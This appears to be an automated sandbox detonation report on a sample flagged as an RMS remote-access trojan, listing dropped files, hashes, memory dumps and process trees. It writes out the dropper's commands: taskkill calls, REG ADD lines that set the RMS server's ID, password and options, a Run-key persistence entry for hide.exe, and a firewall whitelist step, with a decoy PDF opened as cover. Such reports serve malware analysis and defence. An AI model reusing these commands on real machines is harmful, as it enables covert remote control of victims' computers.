SHA256 f5609e3bcc1695839ae0d3a3ff08d5c73d0bab4afa3a2b5fced6c9b14f2aa993
SHA512 cb3d254c7ee4c918a320629e461b99acf90ef92d0276d2663f1b93ea17aa8612226c39c7c234283955fe9e071f7fa324f2586e7eba8ebc3fb5674f58af005e26

memory/1836-88-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-89-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-90-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-91-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-92-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-93-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-94-0x0000000000400000-0x00000000004D3000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/1836-97-0x0000000000400000-0x00000000004D3000-memory.dmp

\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.dat

MD5 27a98c9a7fa7120147ae523efa9fadbf
SHA1 6a5ca3b9ee0a048f0aee1e99cbf3943d84f597ff
SHA256 53071088adb86f5d7a8c82573da94849edbd5f102bc94c9775247a54e26eaf57
SHA512 8f09b0211e6c4c6d5ddf9a797e59501bb0db4cb2d8d730f4c412a4b83adf68ad617516f330e1b0bcfecb07c514be56440e5b2ac3c55537495ce19ae64fcbf03c

memory/2028-104-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/1836-106-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/2028-105-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-107-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-108-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-109-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-110-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-111-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-112-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-113-0x0000000000400000-0x0000000000AF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/2028-115-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-118-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-119-0x0000000000240000-0x0000000000241000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/1604-135-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/1604-136-0x00000000003C0000-0x00000000003C1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/1604-138-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/1604-139-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/1604-141-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/1604-143-0x0000000000400000-0x0000000000AF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.dat

MD5 a24ce4468618751732a5f3cd01e66a8b
SHA1 4d46fb773c02a9ff98e998da4f0777fb5d9f796b
SHA256 acf797494691e34077f9e6cda9a39f91a3efa0a840b71859ffde36bf3e228f2e
SHA512 4eb928491764b2960474e71229d8a3f219029f91ff3725218d58de83ae414c3f7b3bc421915b008aaf1393706a0c836615906bd6a6291af6370bb9f98ab58a3a

\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/1756-148-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-149-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-150-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-151-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-152-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-153-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-154-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-161-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-162-0x0000000000230000-0x0000000000231000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-28 22:17

Reported

2022-01-28 22:45

Platform

win10-en-20211208

Max time kernel

163s

Max time network

170s

Command Line

"C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe"

Signatures

RMS

trojan rat rms

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\exe\StubAtl.pdb C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\exe\StubAtl.pdb C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
File opened for modification C:\Windows\SysWOW64\StubAtl.pdb C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A

autoit_exe

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2800 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2800 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2800 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2844 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 2440 wrote to memory of 3956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 3956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 3956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2440 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2440 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2440 wrote to memory of 868 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 2440 wrote to memory of 868 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 2440 wrote to memory of 868 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 1796 wrote to memory of 588 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 1796 wrote to memory of 588 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 1796 wrote to memory of 588 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe

"C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe" /rhc uac.cmd

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\uac.cmd" "

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Options" /t REG_BINARY /d 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

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003500310035002d003100330037002d003900320034003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e0074007200750065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CallbackSettings" /t REG_BINARY /d fffe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "notification" /t REG_BINARY /d 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

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d 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

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v load /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

hide.exe /fwl Internet C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\MIP1023.pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B211C197798B0AC0E6EAFD57286624E5 --mojo-platform-channel-handle=1680 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

